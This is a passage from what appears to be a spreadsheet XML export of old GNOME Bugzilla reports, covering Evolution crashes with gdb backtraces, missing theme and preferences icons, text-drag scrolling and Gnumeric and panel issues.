  </si>
  <si>
    <t>Using e.g. testtext load a file (e.g. 3DRings.xpm) select some lines
then start draging the selection the following will happen:
As soon as you move the mouse on or after line 21 the text is scrolled
*very* rapidly.
There are two issues here: it seems that the automatic scrolling
could probably start 3 or 4 lines later as most editors do the
scrolling while dragging is too fast for any human being so it is
virtually impossible to drop text at the right place.
Arno</t>
  </si>
  <si>
    <t>GNOME-THEMES-307483</t>
  </si>
  <si>
    <t>theme-highcontrastinverse</t>
  </si>
  <si>
    <t>GNOME-THEMES</t>
  </si>
  <si>
    <t>No HighContrastLargePrintInverse icon for mouse (System Pref &gt; Hardware)</t>
  </si>
  <si>
    <t>Distribution/Version: Latest Update
Using latest linux internal build gnome 2.6
While desktop theme is HighContrastLargePrintInverse there is no icon for the
mouse in Launch&gt;Preferences&gt;System Prefenrences&gt;Hardware.</t>
  </si>
  <si>
    <t>vincent.quigley</t>
  </si>
  <si>
    <t>EVOLUTION-215625</t>
  </si>
  <si>
    <t>Evolution: Error downloading RDF:http://www.perl.com/pace/news.rss</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.99.2
Synopsis: Evolution: Error downloading RDF:http://www.perl.com/pace/news.rss
Bugzilla-Product: Evolution
Bugzilla-Component: Summary [was My Evolution]
Description:
Software: evolution-0.99.2-ximian.3
Failed to load news indexes from perl.com. 
Unknown reporter: jzhao@qcorps.com changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>jzhao</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-59396</t>
  </si>
  <si>
    <t>discard all changes in the control centrel</t>
  </si>
  <si>
    <t xml:space="preserve">Package: control-center
Severity: normal
Version: 1.4.0.1
Synopsis: discard all changes in the control centrel
Bugzilla-Product: control-center
Bugzilla-Component: general
Description:
I get this bug when I discard all changes in thet Control Center
Debugging Information:
(no debugging symbols found)...0x40585519 in __wait4 ()
   from /lib/i686/libc.so.6
#0  0x40585519 in __wait4 () from /lib/i686/libc.so.6
#1  0x405f59e4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x40166262 in gnome_segv_handle (signum=11) at gnome-init.c:659
#3  
#4  0x4054b01a in chunk_free (ar_ptr=0x405f3f00 p=0x81d9c88) at malloc.c:3128
#5  0x4054ad59 in __libc_free (mem=0x81d9c90) at malloc.c:3054
#6  0x4009c1f1 in g_free (mem=0x81d9c90) at gmem.c:411
#7  0x40302c39 in gtk_type_free (type=51989 mem=0x81d9c90)
    at gtktypeutils.c:419
#8  0x402be9b7 in gtk_object_finalize (object=0x81d9c90) at gtkobject.c:272
#9  0x40314d24 in gtk_widget_finalize (object=0x81d9c90) at gtkwidget.c:4446
#10 0x402c0889 in gtk_object_unref (object=0x81d9c90) at gtkobject.c:1194
#11 0x40315d4d in gtk_widget_unref (widget=0x81d9c90) at gtkwidget.c:4884
#12 0x4017ab45 in gnome_stock_destroy (object=0x8151168) at gnome-stock.c:319
#13 0x402ace4b in gtk_marshal_NONE__NONE (object=0x8151168 
    func=0x4017aa48  func_data=0x0 args=0xbfffcfb8)
    at gtkmarshal.c:312
#14 0x402db9fb in gtk_signal_real_emit (object=0x8151168 signal_id=1 
    params=0xbfffcfb8) at gtksignal.c:1492
#15 0x402d9a30 in gtk_signal_emit (object=0x8151168 signal_id=1)
    at gtksignal.c:552
#16 0x402be909 in gtk_object_shutdown (object=0x8151168) at gtkobject.c:255
#17 0x40314ba1 in gtk_widget_shutdown (object=0x8151168) at gtkwidget.c:4392
#18 0x402be8ab in gtk_object_destroy (object=0x8151168) at gtkobject.c:246
#19 0x4030d6f1 in gtk_widget_destroy (widget=0x8151168) at gtkwidget.c:1391
#20 0x40249e21 in gtk_box_forall (container=0x81b9ef8 include_internals=0 
    callback=0x804ce50  callback_data=0x0) at gtkbox.c:776
#21 0x4026afeb in gtk_container_foreach (container=0x81b9ef8 
    callback=0x804ce50  callback_data=0x0)
    at gtkcontainer.c:1125
#22 0x40269eb4 in gtk_container_destroy (object=0x81b9ef8)
    at gtkcontainer.c:631
#23 0x402ace4b in gtk_marshal_NONE__NONE (object=0x81b9ef8 
    func=0x40269df4  func_data=0x0 args=0xbfffd408)
    at gtkmarshal.c:312
#24 0x402db9fb in gtk_signal_real_emit (object=0x81b9ef8 signal_id=1 
    params=0xbfffd408) at gtksignal.c:1492
#25 0x402d9a30 in gtk_signal_emit (object=0x81b9ef8 signal_id=1)
    at gtksignal.c:552
#26 0x402be909 in gtk_object_shutdown (object=0x81b9ef8) at gtkobject.c:255
#27 0x40314ba1 in gtk_widget_shutdown (object=0x81b9ef8) at gtkwidget.c:4392
#28 0x402be8ab in gtk_object_destroy (object=0x81b9ef8) at gtkobject.c:246
#29 0x4030d6f1 in gtk_widget_destroy (widget=0x81b9ef8) at gtkwidget.c:1391
#30 0x40249e21 in gtk_box_forall (container=0x81b9eb0 include_internals=0 
    callback=0x804ce50  callback_data=0x0) at gtkbox.c:776
#31 0x4026afeb in gtk_container_foreach (container=0x81b9eb0 
    callback=0x804ce50  callback_data=0x0)
    at gtkcontainer.c:1125
#32 0x40269eb4 in gtk_container_destroy (object=0x81b9eb0)
    at gtkcontainer.c:631
#33 0x402ace4b in gtk_marshal_NONE__NONE (object=0x81b9eb0 
    func=0x40269df4  func_data=0x0 args=0xbfffd858)
    at gtkmarshal.c:312
#34 0x402db9fb in gtk_signal_real_emit (object=0x81b9eb0 signal_id=1 
    params=0xbfffd858) at gtksignal.c:1492
#35 0x402d9a30 in gtk_signal_emit (object=0x81b9eb0 signal_id=1)
    at gtksignal.c:552
#36 0x402be909 in gtk_object_shutdown (object=0x81b9eb0) at gtkobject.c:255
#37 0x40314ba1 in gtk_widget_shutdown (object=0x81b9eb0) at gtkwidget.c:4392
#38 0x402be8ab in gtk_object_destroy (object=0x81b9eb0) at gtkobject.c:246
#39 0x4030d6f1 in gtk_widget_destroy (widget=0x81b9eb0) at gtkwidget.c:1391
#40 0x40245c4a in gtk_bin_forall (container=0x80baa28 include_internals=0 
    callback=0x804ce50  callback_data=0x0) at gtkbin.c:276
#41 0x4026afeb in gtk_container_foreach (container=0x80baa28 
    callback=0x804ce50  callback_data=0x0)
    at gtkcontainer.c:1125
#42 0x40269eb4 in gtk_container_destroy (object=0x80baa28)
    at gtkcontainer.c:631
#43 0x402ace4b in gtk_marshal_NONE__NONE (object=0x80baa28 
    func=0x40269df4  func_data=0x0 args=0xbfffdca8)
    at gtkmarshal.c:312
#44 0x402db9fb in gtk_signal_real_emit (object=0x80baa28 signal_id=1 
    params=0xbfffdca8) at gtksignal.c:1492
#45 0x402d9a30 in gtk_signal_emit (object=0x80baa28 signal_id=1)
    at gtksignal.c:552
#46 0x402be909 in gtk_object_shutdown (object=0x80baa28) at gtkobject.c:255
#47 0x40314ba1 in gtk_widget_shutdown (object=0x80baa28) at gtkwidget.c:4392
#48 0x402be8ab in gtk_object_destroy (object=0x80baa28) at gtkobject.c:246
#49 0x4030d6f1 in gtk_widget_destroy (widget=0x80baa28) at gtkwidget.c:1391
#50 0x40249e21 in gtk_box_forall (container=0x816e0c0 include_internals=0 
    callback=0x804ce50  callback_data=0x0) at gtkbox.c:776
#51 0x4026afeb in gtk_container_foreach (container=0x816e0c0 
    callback=0x804ce50  callback_data=0x0)
    at gtkcontainer.c:1125
#52 0x40269eb4 in gtk_container_destroy (object=0x816e0c0)
    at gtkcontainer.c:631
#53 0x402ace4b in gtk_marshal_NONE__NONE (object=0x816e0c0 
    func=0x40269df4  func_data=0x0 args=0xbfffe0f8)
    at gtkmarshal.c:312
#54 0x402db9fb in gtk_signal_real_emit (object=0x816e0c0 signal_id=1 
    params=0xbfffe0f8) at gtksignal.c:1492
#55 0x402d9a30 in gtk_signal_emit (object=0x816e0c0 signal_id=1)
    at gtksignal.c:552
#56 0x402be909 in gtk_object_shutdown (object=0x816e0c0) at gtkobject.c:255
#57 0x40314ba1 in gtk_widget_shutdown (object=0x816e0c0) at gtkwidget.c:4392
#58 0x402be8ab in gtk_object_destroy (object=0x816e0c0) at gtkobject.c:246
#59 0x4030d6f1 in gtk_widget_destroy (widget=0x816e0c0) at gtkwidget.c:1391
#60 0x40249e4e in gtk_box_forall (container=0x811c050 include_internals=0 
    callback=0x804ce50  callback_data=0x0) at gtkbox.c:786
#61 0x4026afeb in gtk_container_foreach (container=0x811c050 
    callback=0x804ce50  callback_data=0x0)
    at gtkcontainer.c:1125
#62 0x40269eb4 in gtk_container_destroy (object=0x811c050)
    at gtkcontainer.c:631
#63 0x402ace4b in gtk_marshal_NONE__NONE (object=0x811c050 
    func=0x40269df4  func_data=0x0 args=0xbfffe548)
    at gtkmarshal.c:312
#64 0x402db9fb in gtk_signal_real_emit (object=0x811c050 signal_id=1 
    params=0xbfffe548) at gtksignal.c:1492
#65 0x402d9a30 in gtk_signal_emit (object=0x811c050 signal_id=1)
    at gtksignal.c:552
#66 0x402be909 in gtk_object_shutdown (object=0x811c050) at gtkobject.c:255
#67 0x40314ba1 in gtk_widget_shutdown (object=0x811c050) at gtkwidget.c:4392
#68 0x402be8ab in gtk_object_destroy (object=0x811c050) at gtkobject.c:246
#69 0x4030d6f1 in gtk_widget_destroy (widget=0x811c050) at gtkwidget.c:1391
#70 0x0804fa9a in gtk_multiview_get_type () at eval.c:41
#71 0x4026afeb in gtk_container_foreach (container=0x8184d90 
    callback=0x804ce50  callback_data=0x0)
    at gtkcontainer.c:1125
#72 0x40269eb4 in gtk_container_destroy (object=0x8184d90)
    at gtkcontainer.c:631
#73 0x402ace4b in gtk_marshal_NONE__NONE (object=0x8184d90 
    func=0x40269df4  func_data=0x0 args=0xbfffe998)
    at gtkmarshal.c:312
#74 0x402db9fb in gtk_signal_real_emit (object=0x8184d90 signal_id=1 
    params=0xbfffe998) at gtksignal.c:1492
#75 0x402d9a30 in gtk_signal_emit (object=0x8184d90 signal_id=1)
    at gtksignal.c:552
#76 0x402be909 in gtk_object_shutdown (object=0x8184d90) at gtkobject.c:255
#77 0x40314ba1 in gtk_widget_shutdown (object=0x8184d90) at gtkwidget.c:4392
#78 0x402be8ab in gtk_object_destroy (object=0x8184d90) at gtkobject.c:246
#79 0x4030d6f1 in gtk_widget_destroy (widget=0x8184d90) at gtkwidget.c:1391
#80 0x0804e8f3 in exit_dialog_ok_callback () at eval.c:41
#81 0x402ace4b in gtk_marshal_NONE__NONE (object=0x811acb0 
    func=0x804e8d0  func_data=0x0 args=0xbfffedc8)
    at gtkmarshal.c:312
#82 0x402dc56a in gtk_handlers_run (handlers=0x805ffa0 signal=0xbfffed68 
    object=0x811acb0 params=0xbfffedc8 after=0) at gtksignal.c:1917
#83 0x402db9bb in gtk_signal_real_emit (object=0x811acb0 signal_id=109 
    params=0xbfffedc8) at gtksignal.c:1477
#84 0x402d9a30 in gtk_signal_emit (object=0x811acb0 signal_id=109)
    at gtksignal.c:552
#85 0x4024a58c in gtk_button_clicked (button=0x811acb0) at gtkbutton.c:336
#86 0x4024bb02 in gtk_real_button_released (button=0x811acb0)
    at gtkbutton.c:861
#87 0x402ace4b in gtk_marshal_NONE__NONE (object=0x811acb0 
    func=0x4024ba5c  func_data=0x0 args=0xbffff158)
    at gtkmarshal.c:312
#88 0x402db867 in gtk_signal_real_emit (object=0x811acb0 signal_id=108 
    params=0xbffff158) at gtksignal.c:1440
#89 0x402d9a30 in gtk_signal_emit (object=0x811acb0 signal_id=108)
    at gtksignal.c:552
#90 0x4024a4d0 in gtk_button_released (button=0x811acb0) at gtkbutton.c:327
#91 0x4024b477 in gtk_button_button_release (widget=0x811acb0 event=0x818ed8c)
    at gtkbutton.c:721
#92 0x402acc21 in gtk_marshal_BOOL__POINTER (object=0x811acb0 
    func=0x4024b3b4  func_data=0x0 
    args=0xbffff4f8) at gtkmarshal.c:28
#93 0x402db9fb in gtk_signal_real_emit (object=0x811acb0 signal_id=27 
    params=0xbffff4f8) at gtksignal.c:1492
#94 0x402d9a30 in gtk_signal_emit (object=0x811acb0 signal_id=27)
    at gtksignal.c:552
#95 0x40310ee8 in gtk_widget_event (widget=0x811acb0 event=0x818ed8c)
    at gtkwidget.c:2864
#96 0x402acb98 in gtk_propagate_event (widget=0x811acb0 event=0x818ed8c)
    at gtkmain.c:1378
#97 0x402abd55 in gtk_main_do_event (event=0x818ed8c) at gtkmain.c:818
#98 0x4036616b in gdk_event_dispatch (source_data=0x0 
    current_time=0xbffff8c8 user_data=0x0) at gdkevents.c:2139
#99 0x4009b055 in g_main_dispatch (dispatch_time=0xbffff8c8) at gmain.c:656
#100 0x4009b659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#101 0x4009b7e8 in g_main_run (loop=0x818e7b8) at gmain.c:935
#102 0x402ab65b in gtk_main () at gtkmain.c:524
#103 0x0804db2f in main () at eval.c:41
#104 0x404e7177 in __libc_start_main (main=0x804dad8  argc=1 
    ubp_av=0xbffff9bc init=0x804c108  fini=0x8051d4c  
    rtld_fini=0x4000e184  stack_end=0xbffff9b4)
    at ../sysdeps/generic/libc-start.c:129
#0  0x40585519 in __wait4 () from /lib/i686/libc.so.6
No locals.
#1  0x405f59e4 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x40166262 in gnome_segv_handle (signum=11) at gnome-init.c:659
	in gnome-init.c
estatus = 136158352
in_segv = 1
pid = 0
#3  
No locals.
#4  0x4054b01a in chunk_free (ar_ptr=0x405f3f00 p=0x81d9c88) at malloc.c:3128
	in malloc.c
hd = 4294966784
sz = 64
idx = 32
next = 0x81d9cc8
nextsz = 32
prevsz = 4294966784
bck = 0x405f3fb0
fwd = 0x0
islr = 0
sz = 64
next = 0x81d9cc8
bck = 0x405f3fb0
islr = 0
#5  0x4054ad59 in __libc_free (mem=0x81d9c90) at malloc.c:3054
3054	in malloc.c
mem = (void *) 0x0
ar_ptr = (arena *) 0x405f3f00
p = 0x81d9c88
#6  0x4009c1f1 in g_free (mem=0x81d9c90) at gmem.c:411
	in gmem.c
mem = 0xfffffe00
#7  0x40302c39 in gtk_type_free (type=51989 mem=0x81d9c90)
    at gtktypeutils.c:419
	in gtktypeutils.c
mem = 0xbfffcaa8
__node = (GtkTypeNode *) 0x0
sqn = 0
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-08-22 18:45 -------
The original reporter (Bert.Rodiers@esat.kuleuven.ac.be) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component control-center-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>bert.rodiers</t>
  </si>
  <si>
    <t>EVOLUTION-256760</t>
  </si>
  <si>
    <t>Highlighted message (any in Inbox) and hit forward immediate crash.</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Red Hat Linux release 9 (Shrike)
Package: Evolution
Priority: Normal
Version: GNOME
      2
   .
      5
   .
      2
    unspecified
Gnome-Distributor: 
      GNOME.Org
Synopsis: Highlighted message (any in Inbox) and hit forward immediate crash.
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Bugzilla-Version: unspecified
BugBuddy-GnomeVersion: 2.0 (2.5.1)
Description:
Description of the crash:
Steps to reproduce the crash:
1. 
2. 
3. 
Expected Results:
How often does this happen?
Additional Information:
Debugging Information:
Backtrace was generated from '/usr/bin/evolution-1.5'
[New Thread 1096854976 (LWP 24339)]
[New Thread 1171274544 (LWP 24352)]
[New Thread 1162881840 (LWP 24351)]
[New Thread 1154489136 (LWP 24350)]
[New Thread 1146096432 (LWP 24349)]
[New Thread 1135614768 (LWP 24348)]
[New Thread 1127222064 (LWP 24347)]
[New Thread 1116957488 (LWP 24346)]
0xffffe002 in ?? ()
#0  0xffffe002 in ?? ()
#1  0x40493f95 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
#2  0x080661c8 in segv_redirect (sig=11) at main.c:456
#3  
#4  0x42079858 in strcmp () from /lib/tls/libc.so.6
#5  0x4008be0d in e_signature_list_find (signatures=0x80bc788
type=139574856 
    key=0xbfffd998 ÃˆÃ™Ã¿Â¿@\213\216A\bdF\b\001) at
e-signature-list.c:421
#6  0x418bfe82 in mail_config_get_signature_by_uid (uid=0x80bc788 )
    at mail-config.c:1063
#7  0x418eae69 in set_editor_signature (composer=0x8466408)
    at e-msg-composer.c:3319
#8  0x418e8b40 in from_changed_cb (hdrs=0x851b818 data=0x8466408)
    at e-msg-composer.c:2511
#9  0x418ea52a in create_composer (visible_mask=159) at
e-msg-composer.c:3176
#10 0x418eaefa in e_msg_composer_new_with_type (type=1)
    at e-msg-composer.c:3348
#11 0x418eaf8a in e_msg_composer_new () at e-msg-composer.c:3376
#12 0x418ab21d in create_new_composer () at em-utils.c:304
#13 0x418ab8f8 in forward_non_attached (messages=0x83b3d28 style=1)
    at em-utils.c:539
#14 0x418ab9ff in forward_inline (folder=0x81761a8 uids=0x83b3d04 
    messages=0x83b3d28 user_data=0x0) at em-utils.c:562
#15 0x418c98f7 in get_messages_got (mm=0x83aa6a8) at mail-ops.c:1799
#16 0x418c4a8d in mail_msgport_replied (source=0x80bbea8 cond=G_IO_IN
    d=0x80bc3e8) at mail-mt.c:398
#17 0x411db33d in g_vasprintf () from /usr/lib/libglib-2.0.so.0
#18 0x411b32e4 in unblock_source () from /usr/lib/libglib-2.0.so.0
#19 0x411b4529 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#20 0x411b49ea in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#21 0x411b5322 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#22 0x405d2899 in bonobo_main () from /usr/lib/libbonobo-2.so.0
#23 0x080666a9 in main (argc=1 argv=0xbfffde64) at main.c:600
#24 0x42015704 in __libc_start_main () from /lib/tls/libc.so.6
Thread 8 (Thread 1116957488 (LWP 24346)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x40086306 in thread_dispatch (din=0x80bb258) at e-msgport.c:874
	e = (EThread *) 0x80bb258
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x81aad00
	self = 1116957488
#2  0x400f3484 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
Thread 7 (Thread 1127222064 (LWP 24347)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x40086306 in thread_dispatch (din=0x80bb088) at e-msgport.c:874
	e = (EThread *) 0x80bb088
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x0
	self = 1127222064
#2  0x400f3484 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
Thread 6 (Thread 1135614768 (LWP 24348)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x40086306 in thread_dispatch (din=0x80bb258) at e-msgport.c:874
	e = (EThread *) 0x80bb258
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x83f5b10
	self = 1135614768
#2  0x400f3484 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
Thread 5 (Thread 1146096432 (LWP 24349)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x40086306 in thread_dispatch (din=0x84d2c28) at e-msgport.c:874
	e = (EThread *) 0x84d2c28
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x0
	self = 1146096432
#2  0x400f3484 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
Thread 4 (Thread 1154489136 (LWP 24350)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x411b578e in g_main_loop_get_context () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#2  0x411b49bf in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0x411b5322 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0x41b08327 in startup_mainloop (arg=0x0) at e-book.c:2374
	loop = (GMainLoop *) 0x84f4fb8
#5  0x400f3484 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
Thread 3 (Thread 1162881840 (LWP 24351)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x4119c48e in g_async_queue_pop () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#2  0x41afc49e in worker (data=0x0) at e-book-async.c:25
	msg = (EBookMsg *) 0x851c1a0
#3  0x411ce9b0 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0x400f3484 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
Thread 2 (Thread 1171274544 (LWP 24352)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x411b578e in g_main_loop_get_context () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#2  0x411b49bf in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0x411b5322 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0x406f8bef in link_thread_io_context () from
/usr/lib/libORBit-2.so.0
No symbol table info available.
#5  0x411ce9b0 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#6  0x400f3484 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
Thread 1 (Thread 1096854976 (LWP 24339)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x40493f95 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
No symbol table info available.
#2  0x080661c8 in segv_redirect (sig=11) at main.c:456
No locals.
#3  
No symbol table info available.
#4  0x42079858 in strcmp () from /lib/tls/libc.so.6
No symbol table info available.
#5  0x4008be0d in e_signature_list_find (signatures=0x80bc788
type=139574856 
    key=0xbfffd998 ÃˆÃ™Ã¿Â¿@\213\216A\bdF\b\001) at
e-signature-list.c:421
	found = 1
	signature = (const ESignature *) 0x418bfe59
	it = (EIterator *) 0x418bfe65
	val = 0x80bc788 
#6  0x418bfe82 in mail_config_get_signature_by_uid (uid=0x80bc788 )
    at mail-config.c:1063
No locals.
#7  0x418eae69 in set_editor_signature (composer=0x8466408)
    at e-msg-composer.c:3319
	id = (EAccountIdentity *) 0x80bc3d0
#8  0x418e8b40 in from_changed_cb (hdrs=0x851b818 data=0x8466408)
    at e-msg-composer.c:2511
	composer = (EMsgComposer *) 0x8466408
#9  0x418ea52a in create_composer (visible_mask=159) at
e-msg-composer.c:3176
	composer = (EMsgComposer *) 0x8466408
	vbox = (GtkWidget *) 0x851bdf8
	expander_hbox = (GtkWidget *) 0x1
	editor_server = 0x808ba00
	ev = {_id = 0x80720dc  _major = 134809024 _any = {
    _type = 0xbfffda38 _value = 0x41157e48 _release = 168 'Â¨'}}
	gconf = (GConfClient *) 0x1
	vis = 157
	control_frame = (BonoboControlFrame *) 0x1
	attachment_pixbuf = (GdkPixbuf *) 0x8090aa8
#10 0x418eaefa in e_msg_composer_new_with_type (type=1)
    at e-msg-composer.c:3348
	send_html = 1
	gconf = (GConfClient *) 0x8090aa8
	new = (EMsgComposer *) 0x41210010
#11 0x418eaf8a in e_msg_composer_new () at e-msg-composer.c:3376
No locals.
#12 0x418ab21d in create_new_composer () at em-utils.c:304
	composer = (EMsgComposer *) 0x42a07458
#13 0x418ab8f8 in forward_non_attached (messages=0x83b3d28 style=1)
    at em-utils.c:539
	message = (CamelMimeMessage *) 0x42a07458
	wrapper = (CamelDataWrapper *) 0x411737ef
	composer = (EMsgComposer *) 0x400f707b
	subject = 0x84d3ad8 [Fwd: Data General Hardware]
	text = 0x84665e8 -------- Forwarded Message --------\nFrom:
Bob Rodella &lt;a
href=\mailto:Bob%20Rodella%20%3cBob_Rodella@parkplaceintl.com%3e\&gt;Bob_Rodella@parkplaceintl.comTo:
Harold Sch...
	i = 0
	flags = 2
#14 0x418ab9ff in forward_inline (folder=0x81761a8 uids=0x83b3d04 
    messages=0x83b3d28 user_data=0x0) at em-utils.c:562
No locals.
#15 0x418c98f7 in get_messages_got (mm=0x83aa6a8) at mail-ops.c:1799
	m = (struct _get_messages_msg *) 0x83aa6a8
#16 0x418c4a8d in mail_msgport_replied (source=0x80bbea8 cond=G_IO_IN
    d=0x80bc3e8) at mail-mt.c:398
	port = (EMsgPort *) 0x80bc3e8
	m = (mail_msg_t *) 0x83aa6a8
#17 0x411db33d in g_vasprintf () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#18 0x411b32e4 in unblock_source () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#19 0x411b4529 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#20 0x411b49ea in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#21 0x411b5322 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#22 0x405d2899 in bonobo_main () from /usr/lib/libbonobo-2.so.0
No symbol table info available.
#23 0x080666a9 in main (argc=1 argv=0xbfffde64) at main.c:600
	options = {{longName = 0x806e012 component shortName = 99 'c' 
    argInfo = 1 arg = 0x806fc10 val = 0 
    descrip = 0x806e020 Start Evolution activating the specified
component 
    argDescrip = 0x0} {longName = 0x806e053 offline shortName = 0
'\0' 
    argInfo = 0 arg = 0x806fc00 val = 0 
    descrip = 0x806e05b Start in offline mode argDescrip = 0x0} {
    longName = 0x806e071 online shortName = 0 '\0' argInfo = 0 
    arg = 0x806fbfc val = 0 descrip = 0x806e078 Start in online
mode 
    argDescrip = 0x0} {longName = 0x806e08d force-shutdown 
    shortName = 0 '\0' argInfo = 0 arg = 0x806fc08 val = 0 
    descrip = 0x806e0a0 Forcibly shut down all evolution components 
    argDescrip = 0x0} {longName = 0x806e0cc force-migrate 
    shortName = 0 '\0' argInfo = 0 arg = 0x806fc0c val = 0 
    descrip = 0x806e0e0 Forcibly re-migrate from Evolution 1.4 
    argDescrip = 0x0} {longName = 0x806e107 debug shortName = 0
'\0' 
    argInfo = 1 arg = 0x806fc14 val = 0 
    descrip = 0x806e120 Send the debugging output of all components to
a file. argDescrip = 0x0} {longName = 0x806e157 setup-only
shortName = 0 '\0' 
    argInfo = 1073741824 arg = 0x806fc04 val = 0 descrip = 0x0 
    argDescrip = 0x0} {longName = 0x0 shortName = 0 '\0' argInfo = 4
    arg = 0x8070728 val = 0 descrip = 0x806e162 Help options: 
    argDescrip = 0x0} {longName = 0x0 shortName = 0 '\0' argInfo = 0
    arg = 0x0 val = 0 descrip = 0x0 argDescrip = 0x0}}
	uri_list = (GSList *) 0x0
	popt_context_value = {g_type = 0 data = {{v_int = 0 v_uint = 0 
      v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
      v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long =
0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0
      v_pointer = 0x0}}}
	program = (GnomeProgram *) 0x8077748
	popt_context = 0x807a778
	args = (const char **) 0x0
	evolution_directory = 0x8099e88 6f9bb19594b5
#24 0x42015704 in __libc_start_main () from /lib/tls/libc.so.6
No symbol table info available.
#0  0xffffe002 in ?? ()
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>SEAHORSE-132687</t>
  </si>
  <si>
    <t>seahorse-0.7.3: no icon in the 'GNOME Desktop Preferences'</t>
  </si>
  <si>
    <t>Hello
first of all this could be Debian-only related but maybe not.
As in Debian bug #222032 here
        http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=222032
the 'PGP Preferences' in GNOME 2.4 and Seahorse-0.7.3 has no icon. All
is explained in the bug above (even with a possible solution) I don't like
to repeat myself.
If the problem is Debian-only excuse me. On the other hand if the
problem is a general one the solution suggested for Debian could be
general applied.
Thx bye
Gismo / Luca</t>
  </si>
  <si>
    <t>RHYTHMBOX-76558</t>
  </si>
  <si>
    <t>use bonobo for menubar</t>
  </si>
  <si>
    <t>use bonobo for menubar (why? helps understand the problem being solved to
provide the impetus)</t>
  </si>
  <si>
    <t>VTE-398083</t>
  </si>
  <si>
    <t>background not painted correctly when starting up</t>
  </si>
  <si>
    <t>Attaching shot.
When I start my first g-t window (and sometimes the second) the background for the first two lines is black instead of white and any redraw fixes it.  Attaching shot.</t>
  </si>
  <si>
    <t>GNUMERIC-112954</t>
  </si>
  <si>
    <t>non si apre il programma</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  gnumeric
Severity: normal
Version:  0.61
Synopsis: non si apre il programma
Class:    support
Distribuzione: Red Hat Linux release 7.1 (Seawolf)
System: Linux 2.4.2-2 i686 unknown
C library: glibc-2.2.2-10
C compiler: 2.96
glib: glib-1.2.9-1
GTK+: gtk+-1.2.9-4
ORBit: ORBit-0.5.7-3
gnome-libs: gnome-libs-1.2.8-11
libxml: libxml-1.8.10-1
gnome-print: gnome-print-0.25-9
gnome-core: gnome-core-1.2.4-16
Description:
con altri user va bene con questo user nulla da il messaggio nessuna
risposta da myself grazie
------- Bug moved to this database by unknown@bugzilla.gnome.org 2003-05-14 03:56 -------
The original reporter (ninoscarabotti@libero.it) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component jody@gnome.org.
</t>
  </si>
  <si>
    <t>ninoscarabotti</t>
  </si>
  <si>
    <t>GNOME-CORE-22356</t>
  </si>
  <si>
    <t>Crash when opening multiple desktops</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  panel
Severity: normal
Version:  1.2.1
Synopsis: Crash when opening multiple desktops
Class:    sw-bug
Distribution: Redhat 6.2
System: Linux 2.2.16 i686 unknown
C library: glibc-2.1.3-15
C compiler: egcs-2.91.66
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.3
gnome-libs: gnome-libs 1.2.4
libxml: 1.8.9
gnome-print: gnome-print-0.20
gnome-core: gnome-core 1.2.1
Description:
deskguide_applet seems to crash when you open to many desktops using the
